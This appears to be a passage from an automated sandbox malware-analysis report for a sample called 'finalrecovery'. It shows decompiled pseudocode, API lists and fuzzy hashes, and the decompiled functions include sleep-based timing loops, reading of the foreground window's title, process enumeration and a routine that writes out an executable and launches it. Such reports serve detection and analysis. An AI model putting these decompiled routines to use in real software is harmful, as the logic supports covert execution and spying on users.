						if(_t292 <= 0x12c) {
							_t46 = _t292 + 3; // 0x4
							Sleep(_t46 * 0x3e8);
						} else {
							_t134 = E00417D76(_t223, _t322);
							asm("cdq");
							Sleep((_t134 % _t289 + 0x67) * 0x3e8);
						}
					}
				} else {
					_t290 = 0x7d0;
					do {
						_t194 = E00417D76(_t201, _t316);
						asm("cdq");
						_t268 = _t194 % 0x7d0 + 0x3e8;
						Sleep(_t194 % 0x7d0 + 0x3e8);
					} while (E00405F40(Sleep, __edi) != 0);
					goto L3;
				}
			}

0x00408d00
0x00408d00
0x00408d03
0x00408d05
0x00408d10
0x00408d11
0x00408d17
0x00408d1c
0x00408d1e
0x00408d21
0x00408d22
0x00408d23
0x00408d24
0x00408d28
0x00408d2e
0x00408d35
0x00408d3a
0x00408d40
0x00408d42
0x00408d6a
0x00408d73
0x00408d78
0x00408d8f
0x00408d96
0x00408dad
0x00408db4
0x00408db8
0x00408dcb
0x00408dd6
0x00408de0
0x00408deb
0x00408df8
0x00408e03
0x00408e0d
0x00408e18
0x00408e22
0x00408e31
0x00408e38
0x00408e3d
0x00408e46
0x00408e51
0x00408e5c
0x00408e67
0x00408e72
0x00408e7d
0x00408e88
0x00408e8c
0x00408e91
0x00408e93
0x00408ea0
0x00408ea3
0x00408ea4
0x00408eaa
0x00408eb0
0x00408eb7
0x00000000
0x00000000
0x00408ec8
0x00408ecd
0x00408edc
0x00408f2b
0x00408f2e
0x00408f36
0x00408f3b
0x00408f3e
0x00408f48
0x00408f4d
0x00408f51
0x00408f64
0x00408f6a
0x00408f6f
0x00408f79
0x00408f7e
0x00408f83
0x00408f93
0x00408f9e
0x00408fa0
0x00408fab
0x00408faf
0x00408fb4
0x00408fb6
0x00000000
0x00000000
0x00408fc7
0x00408fcf
0x00408fd4
0x00408fd7
0x00000000
0x00000000
0x00408fd9
0x00408fdc
0x00408fea
0x00408ff3
0x00408ff3
0x00408ff5
0x00408ffa
0x00409000
0x00409001
0x0040901a
0x00409020
0x00409025
0x0040902f
0x00409034
0x00409039
0x00409049
0x00409056
0x00409061
0x00409065
0x0040906a
0x0040906c
0x00000000
0x00000000
0x0040907d
0x0040907f
0x00409082
0x00000000
0x00000000
0x00409096
0x00409097
0x0040909f
0x004090a2
0x004090ac
0x004090c5
0x004090c6
0x004090cb
0x004090ce
0x004090da
0x004090ea
0x004090f8
0x00409102
0x00409107
0x0040910a
0x00409110
0x00409117
0x0040912d
0x00409133
0x00409135
0x0040913c
0x0040913c
0x00409140
0x0040915c
0x0040915e
0x00409161
0x00409167
0x0040916c
0x0040916e
0x00409170
0x00409175
0x00409175
0x00409178
0x0040917b
0x0040917d
0x00409183
0x00409183
0x00409186
0x00409189
0x00409194
0x00409197
0x00000000
0x00000000
0x00000000
0x0040918b
0x0040918b
0x0040918e
0x00409190
0x00409190
0x00409199
0x00409199
0x0040919b
0x00000000
0x00000000
0x0040919d
0x004091a0
0x004091c4
0x004091c6
0x004091c6
0x004091cb
0x004091cc
0x004091cd
0x004091ce
0x004091cf
0x004091d0
0x004091d1
0x004091d6
0x004091dd
0x004091e6
0x004091ed
0x004091f4
0x004091fa
0x004091fc
0x00409201
0x00409207
0x0040920e
0x00409216
0x0040921d
0x0040921f
0x0040922a
0x00409236
0x0040923b
0x00409243
0x00409249
0x00409253
0x00409258
0x0040921d
0x00409263
0x0040926d
0x0040926d
0x004091a0
0x004091a2
0x004091a2
0x004091ad
0x004091b0
0x004091b1
0x004091b7
0x004091b9
0x004091b9
0x00000000
0x004091bd
0x00409119
0x00409119
0x0040911f
0x0040911f
0x00000000
0x00409128
0x00408fde
0x00408fe3
0x00408fe3
0x00408f51
0x00408ede
0x00408eed
0x00000000
0x00000000
0x00408eef
0x00408ef2
0x00408ef7
0x00408ef7
0x00408efd
0x00408f1a
0x00408f24
0x00408eff
0x00408eff
0x00408f04
0x00408f14
0x00408f14
0x00408efd
0x00408d44
0x00408d44
0x00408d50
0x00408d50
0x00408d55
0x00408d58
0x00408d5f
0x00408d66
0x00000000
0x00408d50

APIs

Part of subcall function 00405F40: __Init_thread_footer.LIBCMT ref: 00405FE0
Part of subcall function 00405F40: __Init_thread_footer.LIBCMT ref: 004060D6

Sleep.KERNEL32(?,8E1B5714), ref: 00408D5F

Part of subcall function 00405F40: __Init_thread_footer.LIBCMT ref: 004061D5
Part of subcall function 00405F40: GetForegroundWindow.USER32 ref: 00406276
Part of subcall function 00405F40: GetWindowTextA.USER32 ref: 00406291

Sleep.KERNEL32(?,00000000,00000000,?,?,?,?,00000000,?,8E1B5714), ref: 00408F14
Sleep.KERNEL32(00000004,00000000,?,?,?,?,00000000,?,8E1B5714), ref: 00408F24
Sleep.KERNEL32(00000BB8,00000000,00000000,?,?,?,?,?,?,?,?,?,00000000,?,8E1B5714), ref: 00408FE3

Part of subcall function 00403770: CryptAcquireContextW.ADVAPI32(?,00000000,?,00000018,F0000000,8E1B5714), ref: 004037F0
Part of subcall function 00403770: CryptCreateHash.ADVAPI32(?,0000800C,00000000,00000000,?), ref: 00403814
Part of subcall function 00403770: _mbstowcs.LIBCMT ref: 00403867
Part of subcall function 00403770: CryptHashData.ADVAPI32(?,00000000,?,00000000), ref: 0040387E
Part of subcall function 00403770: GetLastError.KERNEL32 ref: 00403888

Sleep.KERNELBASE(000007D0), ref: 004091B7
Sleep.KERNEL32(000007D0), ref: 004091C4

Memory Dump Source

Source File: 00000002.00000002.323409231.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.323409231.0000000000452000.00000040.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_finalrecovery.jbxd

Yara matches

Similarity

API ID: Sleep$CryptInit_thread_footer$HashWindow$AcquireContextCreateDataErrorForegroundLastText_mbstowcs
String ID:
API String ID: 1673536643-0
Opcode ID: 93d54cd6283cecdeca315580c0f5c59f7b65aaeee526e962273c5f1feec115dc
Instruction ID: b9b459d17b5c228be67a2aa04d5f6ab2d0f75a9a8205617ba879f91df248ea82
Opcode Fuzzy Hash: 93d54cd6283cecdeca315580c0f5c59f7b65aaeee526e962273c5f1feec115dc
Instruction Fuzzy Hash: F6C1C0B19001148ADB14F771CD997EE72689F54308F4041BEE94AB72C3EE7C6E49CA6D

Uniqueness

Uniqueness Score: -1.00%

Function 10001ED9 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 183
processCOMMON

Download Yara Rule

C-Code - Quality: 78%

			E10001ED9(void* __ecx, void* __edx, void* __eflags, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				void* _v12;
				void* _v132;
				void* _v348;
				void* _v352;
				void* _v356;
				void* _v360;
				void* _v364;
				void* _v368;
				intOrPtr _v376;
				intOrPtr _v400;
				intOrPtr _v408;
				char _v412;
				void* _v416;
				void* _v424;
				void* _v440;
				void* _v456;
				void* _v468;
				intOrPtr _v472;
				void* _v476;
				char _v488;
				void* _v492;
				struct _PROCESS_INFORMATION _v504;
				char _v508;
				void* _v512;
				char _v524;
				char _v528;
				void* _v532;
				char _v548;
				char _v552;
				void* _v576;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t56;
				void* _t58;
				char _t64;
				void* _t66;
				intOrPtr _t69;
				signed int _t73;
				void* _t74;
				signed int _t103;
				void* _t104;
				void* _t107;
				void* _t129;
				void* _t130;
				intOrPtr _t131;
				intOrPtr _t135;
				void* _t136;
				signed int _t139;
				signed int _t141;
				signed int _t143;
				void* _t144;
				signed int _t153;

				_t144 = __eflags;
				_t128 = __edx;
				_t141 = (_t139 & 0xfffffff8) - 0x214;
				_t56 =  *0x10017004; // 0xb1cc4d85
				_v8 = _t56 ^ _t141;
				_t135 = _a4;
				_t103 = 0;
				_t58 = E100058E6(__ecx, __edx, 0);
				_t107 = _t129;
				E10005965(_t107, _t58);
				_v552 = 0x148;
				_push(0);
				_push( &_v412);
				E10003BE0(_t129);
				_v400 = _a8;
				_v408 = 0x7a120;
				_push(0x7a120); // executed
				_t64 = E100026B3(0, _t128, _t144); // executed
				_v412 = _t64;
				E10003BE0(_t129, _t64, 0, _v408);
				_t143 = _t141 + 0x18;
				_v376 = 0xfde9;
				_v356 = 0;
				_v352 = 0;
				_v348 = 0;
				_v360 = 0;
				_t145 = _v368;
				if(_v368 != 0) {
					E100026CA(_v368);
					_v368 = 0;
				}
				_t66 = E100014C9(_t103,  &_v412, _t128, _t129, _t135, _t145, _t135); // executed
				if(_t66 == 0) {
					_t103 = 0xfffffffd;
				} else {
					if( *((intOrPtr*)(_t143 + 0xb0)) != _t103) {
						_t69 = _v360;
						if(_t69 != 0 && _t69 > 2) {
							_t150 = _t69 - 0x800;
							if(_t69 <= 0x800) {
								_t103 = _t103 | 0xffffffff;
							} else {
								_t113 = _t143 + 0x70;
								E10001C58(_t103, _t143 + 0x70, _t129, _t135, _t150);
								_t151 =  *((intOrPtr*)(_t143 + 0x80)) - _t103;
								if( *((intOrPtr*)(_t143 + 0x80)) == _t103) {
									_t103 = 0xfffffffe;
								} else {
									_t73 = E10005944(_t113, _t151) & 0x80000007;
									if(_t73 < 0) {
										_t73 = (_t73 - 0x00000001 | 0xfffffff8) + 1;
										_t153 = _t73;
									}
									_t22 = _t73 + 4; // 0x4
									_t128 = _t22;
									_t115 =  &_v508;
									_t74 = E10001BB9(_t103,  &_v508, _t22, _t129, _t135, _t153);
									_t103 = 1;
									E100019AC(_t143 + 0x14, E10002439(_t74,  &_v508, _t115, 1));
									E100019AC(_t143 + 0x5c, E100021D6( &_v548, ".exe", 4));
									_t80 =  >=  ? _v488 :  &_v488;
									E1000215E(_t143 + 0x44, E100021D6(_t143 + 0x74,  >=  ? _v488 :  &_v488, _v472));
									E10001B3F(_t143 + 0x58);
									E10001B3F(_t143 + 0x10);
									E10001B3F( &_v548);
									_t87 =  >=  ? _v524 :  &_v524;
									E100016C6(_t143 + 0x88,  >=  ? _v524 :  &_v524);
									_t131 = 0x44;
									_t138 =  >=  ? _v528 :  &_v528;
									E10003BE0(_t131, _t143 + 0x1d0, 0, _t131);
									 *((intOrPtr*)(_t143 + 0x1dc)) = _t131;
									_t143 = _t143 + 0xc;
									asm("stosd");
									asm("stosd");
									asm("stosd");
									asm("stosd");
									if(CreateProcessA( >=  ? _v528 :  &_v528, 0, 0, 0, 0, 0, 0, 0, _t143 + 0x1d4,  &_v504) == 0 ||  *((intOrPtr*)(_t143 + 0x60)) == 0xffffffff) {
										_t96 =  >=  ?  *((void*)(_t143 + 0x44)) : _t143 + 0x40;
										ShellExecuteA(0, "open",  >=  ?  *((void*)(_t143 + 0x44)) : _t143 + 0x40, 0, 0, 0xa);
									}
									E10001B3F(_t143 + 0x40);
								}
								E10001B3F(_t143 + 0x70);
							}
						}
					}
				}
				E100010CC();
				_pop(_t130);
				_pop(_t136);
				_pop(_t104);
				return E100026A5(_t103, _t104, _v8 ^ _t143, _t128, _t130, _t136);
			}

0x10001ed9
0x10001ed9
0x10001edf
0x10001ee5
0x10001eec
0x10001ef5
0x10001ef8
0x10001efc
0x10001f01
0x10001f03
0x10001f08
0x10001f16
0x10001f17
0x10001f18
0x10001f23
0x10001f2f
0x10001f36
0x10001f37
0x10001f44
0x10001f4d
0x10001f52
0x10001f55
0x10001f60
0x10001f67
0x10001f6e
0x10001f75
0x10001f7c
0x10001f83
0x10001f8c
0x10001f92
0x10001f92
0x10001fa1
0x10001fa8
0x1000213a
0x10001fae
0x10001fb5
0x10001fbb
0x10001fc4
0x10001fd3
0x10001fd8
0x10002133
0x10001fde
0x10001fde
0x10001fe2
0x10001fe7
0x10001fee
0x10002127
0x10001ff4
0x10001ff9
0x10001ffe
0x10002004
0x10002004
0x10002004
0x10002005
0x10002005
0x10002008
0x1000200c
0x10002013
0x10002023
0x1000203d
0x1000204f
0x10002063
0x1000206c
0x10002075
0x1000207e
0x10002093
0x10002099
0x100020ac
0x100020b4
0x100020ba
0x100020bf
0x100020cc
0x100020cf
0x100020d0
0x100020d1
0x100020d2
0x100020f2
0x10002106
0x10002114
0x10002114
0x1000211e
0x1000211e
0x1000212c
0x1000212c
0x10001fd8
0x10001fc4
0x10001fb5
0x10002142
0x10002150
0x10002151
0x10002152
0x1000215d

APIs

Part of subcall function 100058E6: GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,10001F01,00000000), ref: 100058F9
Part of subcall function 100058E6: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 1000592A

CreateProcessA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?), ref: 100020EA
ShellExecuteA.SHELL32(00000000,open,?,00000000,00000000,0000000A), ref: 10002114

Strings

.exe, xrefs: 1000202A
open, xrefs: 1000210E

Memory Dump Source

Source File: 00000002.00000002.324049743.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.324045427.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.324060416.0000000010010000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.324067694.0000000010017000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_finalrecovery.jbxd

Similarity

API ID: Time$CreateExecuteFileProcessShellSystemUnothrow_t@std@@@__ehfuncinfo$??2@
String ID: .exe$open
API String ID: 1627157292-49952409
Opcode ID: 7e25857f2893abfb69c25fdff2467f4c439bf1fcfad4a64fa8ddffda9245c45a
Instruction ID: dadc89f3538cc2c7fee676f78565c20390d7026d0332fd3b10d668da5072c214
Opcode Fuzzy Hash: 7e25857f2893abfb69c25fdff2467f4c439bf1fcfad4a64fa8ddffda9245c45a
Instruction Fuzzy Hash: 19515D755083809BE720DF64C881AEFB7E8FF94394F40492EF69982195EB70A944CB63

Uniqueness

Uniqueness Score: -1.00%

Function 00405250 Relevance: 6.1, APIs: 4, Instructions: 71
COMMON

Download Yara Rule

C-Code - Quality: 49%

			E00405250(void* __ebx, int* __ecx, long __edx) {
				signed int _v8;
				char _v258;
				short _v260;
				char _v268;
				char _v272;
				char _v276;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t16;
				short _t18;
				intOrPtr _t23;
				char* _t29;
				void* _t31;
				intOrPtr* _t33;
				void* _t39;
				int* _t40;
				long _t41;
				void* _t42;
				signed int _t43;

				_t31 = __ebx;
				_t16 =  *0x43d054; // 0x8e1b5714
				_v8 = _t16 ^ _t43;
				_t40 = __ecx;
				_t41 = __edx;
				_v276 = __ecx;
				_v276 = __ecx;
				_t18 =  *0x439a7c; // 0x3e
				asm("movq xmm0, [0x439a74]");
				_v260 = _t18;
				asm("movq [ebp-0x108], xmm0");
				E00410A80(__ecx,  &_v258, 0, 0xfa);
				_t42 = OpenProcess(0x410, 0, _t41);
				if(_t42 != 0) {
					_t29 =  &_v276;
					__imp__K32EnumProcessModules(_t42, _t29, 4,  &_v272); // executed
					if(_t29 != 0) {
						__imp__K32GetModuleBaseNameA(_t42, _v276,  &_v268, 0x104); // executed
					}
				}
				FindCloseChangeNotification(_t42); // executed
				_t33 =  &_v268;
				 *_t40 = 0;
				_t40[4] = 0;
				_t39 = _t33 + 1;
				_t40[5] = 0xf;
				 *_t40 = 0;
				do {
					_t23 =  *_t33;
					_t33 = _t33 + 1;
				} while (_t23 != 0);
				E004026C0(_t31, _t40,  &_v268, _t33 - _t39);
				return E0040EB3F(_t40, _t31, _v8 ^ _t43, _t39, _t40, _t42);
			}

0x00405250
0x00405259
0x00405260
0x00405265
0x00405267
0x00405269
0x0040526f
0x00405275
0x0040527b
0x00405288
0x00405298
0x004052a0
0x004052b6
0x004052ba
0x004052c5
0x004052cd
0x004052d5
0x004052ea
0x004052ea
0x004052d5
0x004052f1
0x004052f7
0x004052fd
0x00405303
0x0040530a
0x0040530d
0x00405314
0x00405317
0x00405317
0x00405319
0x0040531a
0x0040532a
0x00405340

APIs

OpenProcess.KERNEL32(00000410,00000000,?,?,?,?), ref: 004052B0
K32EnumProcessModules.KERNEL32(00000000,?,00000004,?,?,?,?,?), ref: 004052CD
K32GetModuleBaseNameA.KERNEL32(00000000,?,?,00000104,?,?,?,?), ref: 004052EA
FindCloseChangeNotification.KERNELBASE(00000000,?,?,?,?), ref: 004052F1

Memory Dump Source

Source File: 00000002.00000002.323409231.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.323409231.0000000000452000.00000040.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_finalrecovery.jbxd

Yara matches

Similarity

API ID: Process$BaseChangeCloseEnumFindModuleModulesNameNotificationOpen
String ID:
API String ID: 1316604328-0
Opcode ID: b0fe695f2a8d01008c7ab91b2f8a898c111ebd17bea975c128503e6dd8a7fc7e
Instruction ID: 5b0ce53f5bd945700f8c3b7f9e2fd6e464f941b1772ca37bd2fc63ba713c63ec
Opcode Fuzzy Hash: b0fe695f2a8d01008c7ab91b2f8a898c111ebd17bea975c128503e6dd8a7fc7e
Instruction Fuzzy Hash: 9D21C731A001199BD725DF65DC05BEAB7B8EF09300F0002BAE645A7290DBF45A858F98

Uniqueness

Uniqueness Score: -1.00%

Function 00420FA8 Relevance: 4.7, APIs: 3, Instructions: 170
fileCOMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 93%

			E00420FA8(signed int _a4, void* _a8, signed int _a12) {
				long _v8;
				signed int _v12;
				void* _v16;
				signed int _v20;
				intOrPtr _v24;
				signed int _v28;
				signed int _v32;
				long _v40;
				char _v44;
				signed int _t59;
				signed int _t64;
				signed int _t66;
				signed int _t68;
				signed int _t71;
				signed int _t72;
				signed int _t74;
				signed int _t81;
				signed int _t84;
				signed int _t91;
				signed int _t93;
				intOrPtr _t95;
				signed int _t100;
				intOrPtr _t101;
				void* _t102;
				signed int _t105;
				signed int _t107;
				void* _t109;

				_t93 = _a12;
				_v8 = _t93;
				_t105 = _a4;
				_t102 = _a8;
				_v16 = _t102;
				if(_t93 == 0) {
					L37:
					__eflags = 0;
					return 0;
				}
				_t113 = _t102;
				if(_t102 != 0) {
					_t100 = _t105 >> 6;
					_t59 = (_t105 & 0x0000003f) * 0x38;
					_v20 = _t100;
					_t101 =  *((intOrPtr*)(0x4508e0 + _t100 * 4));
					_v12 = _t59;
					_t91 =  *((intOrPtr*)(_t101 + _t59 + 0x29));
					__eflags = _t91 - 2;
					if(_t91 == 2) {
						L6:
						__eflags =  !_t93 & 0x00000001;
						if(__eflags == 0) {
							goto L2;
						}
						_t59 = _v12;
						L8:
						__eflags =  *(_t101 + _t59 + 0x28) & 0x00000020;
						if(__eflags != 0) {
							E0041D0D8(_t105, 0, 0, 2);
							_t109 = _t109 + 0x10;
						}
						_t66 = E00420B4F(_t101, __eflags, _t105);
						__eflags = _t66;
						if(_t66 == 0) {
							_t95 =  *((intOrPtr*)(0x4508e0 + _v20 * 4));
							_t68 = _v12;
							__eflags =  *((char*)(_t95 + _t68 + 0x28));
							if( *((char*)(_t95 + _t68 + 0x28)) >= 0) {
								asm("stosd");
								asm("stosd");
								asm("stosd");
								_t71 = WriteFile( *(_t95 + _t68 + 0x18), _v16, _v8,  &_v40, 0); // executed
								__eflags = _t71;
								if(_t71 == 0) {
									_v44 = GetLastError();
								}
								goto L27;
							}
							_t81 = _t91;
							__eflags = _t81;
							if(_t81 == 0) {
								E00420BC0( &_v44, _t105, _t102, _v8);
								goto L16;
							}
							_t84 = _t81 - 1;
							__eflags = _t84;
							if(_t84 == 0) {
								_t83 = E00420D84( &_v44, _t105, _t102, _v8);
								goto L16;
							}
							__eflags = _t84 != 1;
							if(_t84 != 1) {
								goto L33;
							}
							_t83 = E00420C9B( &_v44, _t105, _t102, _v8);
							goto L16;
						} else {
							__eflags = _t91;
							if(__eflags == 0) {
								_t83 = E0042073B(__eflags,  &_v44, _t105, _t102, _v8);
								L16:
								L14:
								L27:
								asm("movsd");
								asm("movsd");
								asm("movsd");
								_t72 = _v28;
								__eflags = _t72;
								if(_t72 != 0) {
									return _t72 - _v24;
								}
								_t74 = _v32;
								__eflags = _t74;
								if(_t74 == 0) {
									_t102 = _v16;
									L33:
									__eflags =  *( *((intOrPtr*)(0x4508e0 + _v20 * 4)) + _v12 + 0x28) & 0x00000040;
									if(__eflags == 0) {
										L35:
										 *((intOrPtr*)(E00413571(__eflags))) = 0x1c;
										_t64 = E0041355E(__eflags);
										 *_t64 =  *_t64 & 0x00000000;
										L3:
										return _t64 | 0xffffffff;
									}
									__eflags =  *_t102 - 0x1a;
									if(__eflags == 0) {
										goto L37;
									}
									goto L35;
								}
								_t107 = 5;
								__eflags = _t74 - _t107;
								if(__eflags != 0) {
									_t64 = E0041353B(_t74);
								} else {
									 *((intOrPtr*)(E00413571(__eflags))) = 9;
									_t64 = E0041355E(__eflags);
									 *_t64 = _t107;
								}
								goto L3;
							}
							__eflags = _t91 - 1 - 1;
							if(_t91 - 1 > 1) {
								goto L33;
							}
							E00420AE7( &_v44, _t102, _v8);
							goto L14;
						}
					}
					__eflags = _t91 - 1;
					if(_t91 != 1) {
						goto L8;
					}
					goto L6;
				}
				L2:
				 *(E0041355E(_t113)) =  *_t62 & 0x00000000;
				 *((intOrPtr*)(E00413571( *_t62))) = 0x16;
				_t64 = E00413497();
				goto L3;
			}

0x00420fb0
0x00420fb3
0x00420fb8
0x00420fbc
0x00420fbf
0x00420fc4
0x0042117b
0x0042117b
0x00000000
0x0042117b
0x00420fca
0x00420fcc
0x00420ff2
0x00420ff8
0x00420ffb
0x00420ffe
0x00421005
0x00421008
0x0042100c
0x0042100f
0x00421016
0x0042101a
0x0042101c
0x00000000
0x00000000
0x0042101e
0x00421021
0x00421021
0x00421026
0x0042102f
0x00421034
0x00421034
0x00421038
0x0042103e
0x00421040
0x0042107e
0x00421085
0x00421088
0x0042108d
0x004210de
0x004210e1
0x004210e2
0x004210ee
0x004210f4
0x004210f6
0x004210fe
0x004210fe
0x00000000
0x00421101
0x00421092
0x00421092
0x00421095
0x004210ce
0x00000000
0x004210ce
0x00421097
0x00421097
0x0042109a
0x004210be
0x00000000
0x004210be
0x0042109c
0x0042109f
0x00000000
0x00000000
0x004210ae
0x00000000
0x00421042
0x00421042
0x00421044
0x00421071
0x00421076
0x00421061
0x00421104
0x00421107
0x00421108
0x00421109
0x0042110a
0x0042110d
0x0042110f
0x00000000
0x00421176
0x00421111
0x00421114
0x00421116
0x00421142
0x00421145
0x00421152
0x00421157
0x0042115e
0x00421163
0x00421169
0x0042116e
0x00420fe6
0x00000000
0x00420fe6
0x00421159
0x0042115c
0x00000000
0x00000000
0x00000000
0x0042115c
0x0042111a
0x0042111b
0x0042111d
0x00421137
0x0042111f
0x00421124
0x0042112a
0x0042112f
0x0042112f
0x00000000
0x0042111d
0x00421048
0x0042104b
0x00000000
0x00000000
0x00421059
0x00000000
0x0042105e
0x00421040
0x00421011
0x00421014
0x00000000
0x00000000
0x00000000
0x00421014
0x00420fce
0x00420fd3
0x00420fdb
0x00420fe1
0x00000000

APIs

Part of subcall function 0042073B: GetConsoleOutputCP.KERNEL32(00000000,00000000,?), ref: 00420783

WriteFile.KERNELBASE(?,00000000,00000000,?,00000000,0000000C,00000000,00000000,?,?,?,00000000,?,?,?,00000000), ref: 004210EE
GetLastError.KERNEL32(?,?,?,00000000,?,?,?,00000000), ref: 004210F8
__dosmaperr.LIBCMT ref: 00421137

Memory Dump Source

Source File: 00000002.00000002.323409231.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.323409231.0000000000452000.00000040.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_finalrecovery.jbxd

Yara matches

Similarity

API ID: ConsoleErrorFileLastOutputWrite__dosmaperr
String ID:
API String ID: 910155933-0
Opcode ID: e24a92b2f476dda8a345309e2f2059689fa752e10403ff131c579cb01226544e
Instruction ID: 8684d1329ffc85c4babdefda143425fec52b07a6a39e87effd7a495816758652
Opcode Fuzzy Hash: e24a92b2f476dda8a345309e2f2059689fa752e10403ff131c579cb01226544e
Instruction Fuzzy Hash: 24513871F00169ABDF209FA5E804FEF7BB5AF19314F94005BE500A7262D339DA82C769

Uniqueness

Uniqueness Score: -1.00%

Function 0041A5F0 Relevance: 4.6, APIs: 3, Instructions: 102
COMMON

Download Yara Rule

C-Code - Quality: 83%

			E0041A5F0(void* __ebx, intOrPtr* _a4) {
				intOrPtr* _v8;
				intOrPtr _v12;
				intOrPtr* _v40;
				intOrPtr _t14;
				intOrPtr _t15;
				intOrPtr _t20;
				intOrPtr _t21;
				intOrPtr _t22;
				void* _t24;
				void* _t26;
				intOrPtr _t27;
				intOrPtr* _t29;
				intOrPtr* _t33;
				intOrPtr* _t36;
				intOrPtr* _t41;
				intOrPtr _t50;
				intOrPtr _t51;
				void* _t53;
				intOrPtr* _t54;
				intOrPtr* _t56;
				intOrPtr* _t59;
				void* _t62;
				intOrPtr _t63;
				intOrPtr* _t64;
				void* _t68;

				_push(_t35);
				_t33 = _a4;
				_t50 = 0;
				_t59 = _t33;
				_t14 =  *_t33;
				while(_t14 != 0) {
					if(_t14 != 0x3d) {
						_t50 = _t50 + 1;
					}
					_t36 = _t59;
					_t53 = _t36 + 1;
					do {
						_t15 =  *_t36;
						_t36 = _t36 + 1;
					} while (_t15 != 0);
					_t59 = _t59 + 1 + _t36 - _t53;
					_t14 =  *_t59;
				}
				_t3 = _t50 + 1; // 0x1
				_t54 = E0041E1DB(_t3, 4);
				if(_t54 == 0) {
					L19:
					_t54 = 0;
					goto L20;
				} else {
					_v8 = _t54;
					while(1) {
						_t51 =  *_t33;
						if(_t51 == 0) {
							break;
						}
						_t41 = _t33;
						_t62 = _t41 + 1;
						do {
							_t20 =  *_t41;
							_t41 = _t41 + 1;
						} while (_t20 != 0);
						_t21 = _t41 - _t62 + 1;
						_v12 = _t21;
						if(_t51 == 0x3d) {
							L15:
							_t33 = _t33 + _t21;
							continue;
						} else {
							_t22 = E0041E1DB(_t21, 1); // executed
							_t63 = _t22;
							if(_t63 == 0) {
								_push(_t54);
								L22();
								E0041E238(0);
								goto L19;
							} else {
								_t24 = E0041C728(_t63, _v12, _t33);
								_t68 = _t68 + 0xc;
								if(_t24 != 0) {
									_push(0);
									_push(0);
									_push(0);
									_push(0);
									_push(0);
									_t26 = E004134C4();
									asm("int3");
									_push(_t63);
									_t64 = _v40;
									if(_t64 != 0) {
										_t27 =  *_t64;
										_push(_t54);
										_t56 = _t64;
										while(_t27 != 0) {
											E0041E238(_t27);
											_t56 = _t56 + 4;
											_t27 =  *_t56;
										}
										_t26 = E0041E238(_t64);
									}
									return _t26;
								} else {
									_t29 = _v8;
									 *_t29 = _t63;
									_v8 = _t29 + 4;
									E0041E238(0);
									_t21 = _v12;
									goto L15;
								}
							}
						}
						goto L28;
					}
					L20:
					E0041E238(0);
					return _t54;
				}
				L28:
			}

0x0041a5f6
0x0041a5f8
0x0041a5fb
0x0041a5ff
0x0041a601
0x0041a61d
0x0041a607
0x0041a609
0x0041a609
0x0041a60a
0x0041a60c
0x0041a60f
0x0041a60f
0x0041a611
0x0041a612
0x0041a619
0x0041a61b
0x0041a61b
0x0041a621
0x0041a62c
0x0041a632
0x0041a6a2
0x0041a6a2
0x00000000
0x0041a634
0x0041a634
0x0041a68b
0x0041a68b
0x0041a68f
0x00000000
0x00000000
0x0041a639
0x0041a63b
0x0041a63e
0x0041a63e
0x0041a640
0x0041a641
0x0041a647
0x0041a64a
0x0041a650
0x0041a689
0x0041a689
0x00000000
0x0041a652
0x0041a655
0x0041a65a
0x0041a660
0x0041a693
0x0041a694
0x0041a69b
0x00000000
0x0041a662
0x0041a667
0x0041a66c
0x0041a671
0x0041a6b5
0x0041a6b6
0x0041a6b7
0x0041a6b8
0x0041a6b9
0x0041a6ba
0x0041a6bf
0x0041a6c5
0x0041a6c6
0x0041a6cb
0x0041a6cd
0x0041a6cf
0x0041a6d0
0x0041a6e0
0x0041a6d5
0x0041a6da
0x0041a6dd
0x0041a6df
0x0041a6e5
0x0041a6eb
0x0041a6ee
0x0041a673
0x0041a673
0x0041a678
0x0041a67d
0x0041a680
0x0041a685
0x00000000
0x0041a688
0x0041a671
0x0041a660
0x00000000
0x0041a650
0x0041a6a4
0x0041a6a6
0x0041a6b2
0x0041a6b2
0x00000000

APIs

_free.LIBCMT ref: 0041A680
_free.LIBCMT ref: 0041A69B
_free.LIBCMT ref: 0041A6A6

Memory Dump Source

Source File: 00000002.00000002.323409231.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.323409231.0000000000452000.00000040.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_finalrecovery.jbxd

Yara matches

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: 43f9dc41e53a34c9fd3c6ab918a14a3cf58d4f1f4392de24730ac9fbc8b2d376
Instruction ID: 7c4d2d3b00bcc51ab3d48f4da8f1b558beaa569ba3aae774fd3a24c990037793
Opcode Fuzzy Hash: 43f9dc41e53a34c9fd3c6ab918a14a3cf58d4f1f4392de24730ac9fbc8b2d376
Instruction Fuzzy Hash: ED21DD376082006BEF089E66D8517FA7799CF82318F2C019FE8C59B341D93A4D83465E

Uniqueness

Uniqueness Score: -1.00%

Function 00405420 Relevance: 4.6, APIs: 3, Instructions: 51
COMMON

Download Yara Rule

C-Code - Quality: 66%

			E00405420(int* __ecx, long __edx) {
				signed int _v8;
